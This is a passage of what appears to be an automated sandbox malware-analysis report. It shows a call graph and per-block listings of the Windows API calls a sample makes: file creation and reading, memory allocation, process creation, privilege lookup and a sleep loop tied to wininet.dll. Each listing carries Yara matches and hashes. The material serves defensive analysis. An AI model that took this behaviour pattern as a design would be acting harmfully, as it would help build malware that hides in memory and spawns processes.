2dd4e40 LdrLoadDll 32259->32260 32261 2ddad07 32259->32261 32260->32261 32261->32156 32262->32233 32264 3809681 32263->32264 32265 380968f LdrInitializeThunk 32263->32265 32264->32011 32265->32011 32267 2ddaf50 LdrLoadDll 32266->32267 32268 2dda67c RtlFreeHeap 32267->32268 32268->32014 32270 2dc7eab 32269->32270 32271 2dc7eb0 32269->32271 32270->31934 32272 2ddbd30 2 API calls 32271->32272 32279 2dc7ed5 32272->32279 32273 2dc7f38 32273->31934 32274 2dd9eb0 2 API calls 32274->32279 32275 2dc7f3e 32276 2dc7f64 32275->32276 32278 2dda5b0 2 API calls 32275->32278 32276->31934 32280 2dc7f55 32278->32280 32279->32273 32279->32274 32279->32275 32281 2ddbd30 2 API calls 32279->32281 32285 2dda5b0 32279->32285 32280->31934 32281->32279 32283 2dc817e 32282->32283 32284 2dda5b0 2 API calls 32282->32284 32283->31891 32284->32283 32286 2ddaf50 LdrLoadDll 32285->32286 32287 2dda5cc 32286->32287 32290 38096e0 LdrInitializeThunk 32287->32290 32288 2dda5e3 32288->32279 32290->32288 32292 2ddb5b3 32291->32292 32295 2dcace0 32292->32295 32296 2dcad04 32295->32296 32297 2dc9c3a 32296->32297 32298 2dcad40 LdrLoadDll 32296->32298 32297->31897 32298->32297 32300 2dcb053 32299->32300 32302 2dcb0d0 32300->32302 32315 2dd9c80 LdrLoadDll 32300->32315 32302->31904 32304 2ddaf50 LdrLoadDll 32303->32304 32305 2dcf1ab 32304->32305 32305->31907 32306 2dda7c0 32305->32306 32307 2ddaf50 LdrLoadDll 32306->32307 32308 2dda7df LookupPrivilegeValueW 32307->32308 32308->31909 32311 2ddaf50 LdrLoadDll 32310->32311 32312 2dda26c 32311->32312 32316 3809910 LdrInitializeThunk 32312->32316 32313 2dda28b 32313->31910 32315->32302 32316->32313 32318 2dcb1e0 32317->32318 32319 2dcb030 LdrLoadDll 32318->32319 32320 2dcb1f4 32319->32320 32320->31844 32322 2dcaf24 32321->32322 32394 2dd9c80 LdrLoadDll 32322->32394 32324 2dcaf5e 32324->31846 32326 2dcf39c 32325->32326 32327 2dcb1b0 LdrLoadDll 32326->32327 32328 2dcf3ae 32327->32328 32395 2dcf280 32328->32395 32331 2dcf3c9 32333 2dcf3d4 32331->32333 32334 2dda480 2 
API calls 32331->32334 32332 2dcf3e1 32335 2dda480 2 API calls 32332->32335 32336 2dcf3f2 32332->32336 32333->31849 32334->32333 32335->32336 32336->31849 32338 2dcf42c 32337->32338 32414 2dcb2a0 32338->32414 32340 2dcf43e 32341 2dcf280 3 API calls 32340->32341 32342 2dcf44f 32341->32342 32343 2dcf459 32342->32343 32344 2dcf471 32342->32344 32345 2dcf464 32343->32345 32346 2dda480 2 API calls 32343->32346 32347 2dda480 2 API calls 32344->32347 32348 2dcf482 32344->32348 32345->31852 32346->32345 32347->32348 32348->31852 32350 2dcca96 32349->32350 32351 2dccaa0 32349->32351 32350->31860 32352 2dcaf00 LdrLoadDll 32351->32352 32353 2dccb3e 32352->32353 32354 2dccb64 32353->32354 32355 2dcb030 LdrLoadDll 32353->32355 32354->31860 32356 2dccb80 32355->32356 32357 2dd4a40 8 API calls 32356->32357 32358 2dccbd5 32357->32358 32358->31860 32360 2dcd636 32359->32360 32361 2dcb030 LdrLoadDll 32360->32361 32362 2dcd64a 32361->32362 32418 2dcd300 32362->32418 32364 2dc908b 32365 2dccbf0 32364->32365 32366 2dccc16 32365->32366 32367 2dcb030 LdrLoadDll 32366->32367 32368 2dccc99 32366->32368 32367->32368 32369 2dcb030 LdrLoadDll 32368->32369 32370 2dccd06 32369->32370 32371 2dcaf00 LdrLoadDll 32370->32371 32372 2dccd6f 32371->32372 32373 2dcb030 LdrLoadDll 32372->32373 32374 2dcce1f 32373->32374 32374->31873 32447 2dcf6c0 32375->32447 32377 2dc8f25 32377->31831 32378 2dc8d14 32378->32377 32452 2dd4390 32378->32452 32380 2dc8d70 32380->32377 32455 2dc8ab0 32380->32455 32383 2ddcf20 2 API calls 32384 2dc8db2 32383->32384 32385 2ddd050 3 API calls 32384->32385 32389 2dc8dc7 32385->32389 32386 2dc7ea0 4 API calls 32386->32389 32389->32377 32389->32386 32390 2dcc7a0 18 API calls 32389->32390 32391 2dc8160 2 API calls 32389->32391 32460 2dcf660 32389->32460 32464 2dcf070 21 API calls 32389->32464 32390->32389 32391->32389 32392->31851 32393->31870 32394->32324 32396 2dcf29a 32395->32396 32404 2dcf350 32395->32404 32397 2dcb030 LdrLoadDll 32396->32397 32398 2dcf2bc 32397->32398 32405 
2dd9f30 32398->32405 32400 2dcf2fe 32408 2dd9f70 32400->32408 32403 2dda480 2 API calls 32403->32404 32404->32331 32404->32332 32406 2ddaf50 LdrLoadDll 32405->32406 32407 2dd9f4c 32406->32407 32407->32400 32409 2ddaf50 LdrLoadDll 32408->32409 32410 2dd9f8c 32409->32410 32413 3809fe0 LdrInitializeThunk 32410->32413 32411 2dcf344 32411->32403 32413->32411 32415 2dcb2c7 32414->32415 32416 2dcb030 LdrLoadDll 32415->32416 32417 2dcb303 32416->32417 32417->32340 32419 2dcd317 32418->32419 32427 2dcf700 32419->32427 32423 2dcd38b 32424 2dcd392 32423->32424 32438 2dda290 LdrLoadDll 32423->32438 32424->32364 32426 2dcd3a5 32426->32364 32428 2dcf725 32427->32428 32439 2dc81a0 32428->32439 32430 2dcd35f 32435 2dda6d0 32430->32435 32431 2dd4a40 8 API calls 32433 2dcf749 32431->32433 32433->32430 32433->32431 32434 2ddbdb0 2 API calls 32433->32434 32446 2dcf540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 32433->32446 32434->32433 32436 2ddaf50 LdrLoadDll 32435->32436 32437 2dda6ef CreateProcessInternalW 32436->32437 32437->32423 32438->32426 32440 2dc829f 32439->32440 32441 2dc81b5 32439->32441 32440->32433 32441->32440 32442 2dd4a40 8 API calls 32441->32442 32443 2dc8222 32442->32443 32444 2ddbdb0 2 API calls 32443->32444 32445 2dc8249 32443->32445 32444->32445 32445->32433 32446->32433 32448 2dcf6df 32447->32448 32449 2dd4e40 LdrLoadDll 32447->32449 32450 2dcf6ed 32448->32450 32451 2dcf6e6 SetErrorMode 32448->32451 32449->32448 32450->32378 32451->32450 32465 2dcf490 32452->32465 32454 2dd43b6 32454->32380 32456 2ddbd30 2 API calls 32455->32456 32459 2dc8ad5 32456->32459 32457 2dc8cea 32457->32383 32459->32457 32484 2dd9870 32459->32484 32461 2dcf673 32460->32461 32532 2dd9e80 32461->32532 32464->32389 32466 2dcf4ad 32465->32466 32472 2dd9fb0 32466->32472 32469 2dcf4f5 32469->32454 32473 2ddaf50 LdrLoadDll 32472->32473 32474 2dd9fcc 32473->32474 32482 38099a0 LdrInitializeThunk 32474->32482 32475 2dcf4ee 32475->32469 32477 2dda000 32475->32477 32478 2ddaf50 
LdrLoadDll 32477->32478 32479 2dda01c 32478->32479 32483 3809780 LdrInitializeThunk 32479->32483 32480 2dcf51e 32480->32454 32482->32475 32483->32480 32485 2ddbf80 2 API calls 32484->32485 32486 2dd9887 32485->32486 32505 2dc9310 32486->32505 32488 2dd98a2 32489 2dd98c9 32488->32489 32490 2dd98e0 32488->32490 32491 2ddbdb0 2 API calls 32489->32491 32493 2ddbd30 2 API calls 32490->32493 32492 2dd98d6 32491->32492 32492->32457 32494 2dd991a 32493->32494 32495 2ddbd30 2 API calls 32494->32495 32496 2dd9933 32495->32496 32502 2dd9bd4 32496->32502 32511 2ddbd70 LdrLoadDll 32496->32511 32498 2dd9bb9 32499 2dd9bc0 32498->32499 32498->32502 32500 2ddbdb0 2 API calls 32499->32500 32501 2dd9bca 32500->32501 32501->32457 32503 2ddbdb0 2 API calls 32502->32503 32504 2dd9c29 32503->32504 32504->32457 32506 2dc9335 32505->32506 32507 2dcace0 LdrLoadDll 32506->32507 32508 2dc9368 32507->32508 32510 2dc938d 32508->32510 32512 2dccf10 32508->32512 32510->32488 32511->32498 32513 2dccf3c 32512->32513 32514 2dda1d0 LdrLoadDll 32513->32514 32515 2dccf55 32514->32515 32516 2dccf5c 32515->32516 32523 2dda210 32515->32523 32516->32510 32520 2dccf97 32521 2dda480 2 API calls 32520->32521 32522 2dccfba 32521->32522 32522->32510 32524 2ddaf50 LdrLoadDll 32523->32524 32525 2dda22c 32524->32525 32531 3809710 LdrInitializeThunk 32525->32531 32526 2dccf7f 32526->32516 32528 2dda800 32526->32528 32529 2dda81f 32528->32529 32530 2ddaf50 LdrLoadDll 32528->32530 32529->32520 32530->32529 32531->32526 32533 2dd9e9c 32532->32533 32534 2ddaf50 LdrLoadDll 32532->32534 32537 3809840 LdrInitializeThunk 32533->32537 32534->32533 32535 2dcf69e 32535->32389 32537->32535 32539 2dd9070 32540 2ddbd30 2 API calls 32539->32540 32542 2dd90ab 32540->32542 32541 2dd918c 32542->32541 32543 2dcace0 LdrLoadDll 32542->32543 32544 2dd90e1 32543->32544 32545 2dd4e40 LdrLoadDll 32544->32545 32547 2dd90fd 32545->32547 32546 2dd9110 Sleep 32546->32547 32547->32541 32547->32546 32550 2dd8c90 LdrLoadDll 32547->32550 32551 
2dd8ea0 LdrLoadDll 32547->32551 32550->32547 32551->32547

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 296 2dda34a-2dda366 297 2dda36c-2dda3a1 NtCreateFile 296->297 298 2dda367 call 2ddaf50 296->298 298->297
                            APIs
                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02DD4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DD4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02DDA39D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID: .z`
                            • API String ID: 823142352-1441809116
                            • Opcode ID: 8b0c0c5ca0e5a5b6ea08b53fb9bbadba6cb2369c8a790a142ee15d1bcbcd67ad
                            • Instruction ID: db6fa998e59bcf84e17f3930cc6b0e9ed104eba13129e6bf6a810fedcc43dc9e
                            • Opcode Fuzzy Hash: 8b0c0c5ca0e5a5b6ea08b53fb9bbadba6cb2369c8a790a142ee15d1bcbcd67ad
                            • Instruction Fuzzy Hash: 1001AFB2605508AFDB08CF98DC94EEB77A9EF8C354F158648FA1D97240C630E8118BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 299 2dda350-2dda3a1 call 2ddaf50 NtCreateFile
                            APIs
                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02DD4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DD4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02DDA39D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID: .z`
                            • API String ID: 823142352-1441809116
                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                            • Instruction ID: 2c50c97cbb0b3dde793002e338fb2e33102be5b0b7b63f39d8f18b22e3718b19
                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                            • Instruction Fuzzy Hash: 16F0BDB2204208AFCB08CF88DC84EEB77ADEF8C754F158248BA1D97240C630E8118BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtReadFile.NTDLL(02DD4D62,5EB65239,FFFFFFFF,02DD4A21,?,?,02DD4D62,?,02DD4A21,FFFFFFFF,5EB65239,02DD4D62,?,00000000), ref: 02DDA445
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                            • Instruction ID: ec6019c6f30e5a37cbc3bc62dd2908b01c8a3aed144c3ae80d1dd795c79c090f
                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                            • Instruction Fuzzy Hash: 1BF0A4B2200208AFCB14DF99DC80EEB77ADEF8C754F158248BA1D97245D630E8118BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtReadFile.NTDLL(02DD4D62,5EB65239,FFFFFFFF,02DD4A21,?,?,02DD4D62,?,02DD4A21,FFFFFFFF,5EB65239,02DD4D62,?,00000000), ref: 02DDA445
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 55a79bdb976a11c3214ab91ef7d89e21b4b1d58aa6fa3a6f7cccc4e8f4176b91
                            • Instruction ID: e06af33e3885ad2bb786cc13db3b0f4d52158669ce39c30e9306e5c91021452a
                            • Opcode Fuzzy Hash: 55a79bdb976a11c3214ab91ef7d89e21b4b1d58aa6fa3a6f7cccc4e8f4176b91
                            • Instruction Fuzzy Hash: 6BF01CB62442146BD714EFE8DC94EA7B3ACEF88760F048959FA1C97240C631E9008BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02DC2D11,00002000,00003000,00000004), ref: 02DDA569
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                            • Instruction ID: 6055a02be76f8a7f566ef914ce43f944e765972fe5dbbff08981c12b2a6216b4
                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                            • Instruction Fuzzy Hash: 4EF015B2200208AFCB14DF89CC80EAB77ADEF88754F118148BE1C97241C630F810CBB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtClose.NTDLL(02DD4D40,?,?,02DD4D40,00000000,FFFFFFFF), ref: 02DDA4A5
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 2a98dc02b48be07a07646dee86cc3133fc265054867ee8f8186be0c59e86bd69
                            • Instruction ID: 3a3822b72e50edc43939177cf6aaf111c98c0be02653daaade3b0921ed0fd772
                            • Opcode Fuzzy Hash: 2a98dc02b48be07a07646dee86cc3133fc265054867ee8f8186be0c59e86bd69
                            • Instruction Fuzzy Hash: 2EE086762005146FD710DFB8CC85EE77B65EF44350F154195FA5D9B341C530A505CBD0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtClose.NTDLL(02DD4D40,?,?,02DD4D40,00000000,FFFFFFFF), ref: 02DDA4A5
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                            • Instruction ID: 218f35d45b002470ed21a263e97400288f2480b91c9751753c15f791706b902a
                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                            • Instruction Fuzzy Hash: 7ED012762002146BD710EB98CC45E97775DEF44750F154495BA1C5B241C530F90086E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: fe7ce575183fc596203c0dd70b1905f1b1d9b074f1bccaaf9aa518d7cf16732b
                            • Instruction ID: 1bc060fa0c64f0542d151c8b5f8ee5b4dc343904ca5f4ba02577e5504774e7c4
                            • Opcode Fuzzy Hash: fe7ce575183fc596203c0dd70b1905f1b1d9b074f1bccaaf9aa518d7cf16732b
                            • Instruction Fuzzy Hash: B490026921305402D180B1995408B1A040997D1242F91D855A1009668CCA55887D6361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: bb5842b683d8a6c7a622e55436e0c12adaadfdf30ce1713a0f5c852782daab2b
                            • Instruction ID: d799bc0c470dc0b9f88d801a89b0d4ce5c9f1c55982e2471a411198bb596e879
                            • Opcode Fuzzy Hash: bb5842b683d8a6c7a622e55436e0c12adaadfdf30ce1713a0f5c852782daab2b
                            • Instruction Fuzzy Hash: 8890027131119802D110A1998404B16040997D1241F51C851A1818668D87D588A97162
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 70693134a63729e8e80c6d2edb7de56566c85404073b44e39e858a42f6d157f2
                            • Instruction ID: cb538d5faaf988a477ea7407a519ab04c876ebdf382ebaff2fd04f6083780985
                            • Opcode Fuzzy Hash: 70693134a63729e8e80c6d2edb7de56566c85404073b44e39e858a42f6d157f2
                            • Instruction Fuzzy Hash: B990027120105802D100A5D95408B56040997E0341F51D451A6018665EC7A588A97171
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 9f28d9388defb32feb957cafd1fd3d9fecc4903665ca2e5b9b1969d0a3da39ba
                            • Instruction ID: 2ba1b55396f415f28f5be31a96ca0ac624a6a8ecd62e75173e0a21340d5c5a01
                            • Opcode Fuzzy Hash: 9f28d9388defb32feb957cafd1fd3d9fecc4903665ca2e5b9b1969d0a3da39ba
                            • Instruction Fuzzy Hash: A790027120105C42D100A1994404F56040997E0341F51C456A1118764D8755C8697561
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 625b28c6c1e46047459aa513af53b2fb6e02e635fd1335a363099d15582b79d1
                            • Instruction ID: b4229797b5e071ee9265592bbec89b5c42883025ad061f727ff4cfe558fda0d1
                            • Opcode Fuzzy Hash: 625b28c6c1e46047459aa513af53b2fb6e02e635fd1335a363099d15582b79d1
                            • Instruction Fuzzy Hash: 019002712010DC02D110A1998404B5A040997D0341F55C851A5418768D87D588A97161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: f923db84a075353d55521d5f5abd0b43b24067ec429777647dc095abba862dcc
                            • Instruction ID: a754fe2768fc37ac731b00994407980d6f91d4c887e0df5d30995608c165a780
                            • Opcode Fuzzy Hash: f923db84a075353d55521d5f5abd0b43b24067ec429777647dc095abba862dcc
                            • Instruction Fuzzy Hash: A490027120509C42D140B1994404F56041997D0345F51C451A10587A4D97658D6DB6A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 256 2dd9070-2dd90b2 call 2ddbd30 259 2dd918c-2dd9192 256->259 260 2dd90b8-2dd9108 call 2ddbe00 call 2dcace0 call 2dd4e40 256->260 267 2dd9110-2dd9121 Sleep 260->267 268 2dd9186-2dd918a 267->268 269 2dd9123-2dd9129 267->269 268->259 268->267 270 2dd912b-2dd9151 call 2dd8c90 269->270 271 2dd9153-2dd9174 call 2dd8ea0 269->271 275 2dd9179-2dd917c 270->275 271->275 275->268
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 02DD9118
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 276 2dd906c-2dd909f 277 2dd90ab-2dd90b2 276->277 278 2dd90a6 call 2ddbd30 276->278 279 2dd918c-2dd9192 277->279 280 2dd90b8-2dd9108 call 2ddbe00 call 2dcace0 call 2dd4e40 277->280 278->277 287 2dd9110-2dd9121 Sleep 280->287 288 2dd9186-2dd918a 287->288 289 2dd9123-2dd9129 287->289 288->279 288->287 290 2dd912b-2dd9151 call 2dd8c90 289->290 291 2dd9153-2dd9174 call 2dd8ea0 289->291 295 2dd9179-2dd917c 290->295 291->295 295->288
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 02DD9118
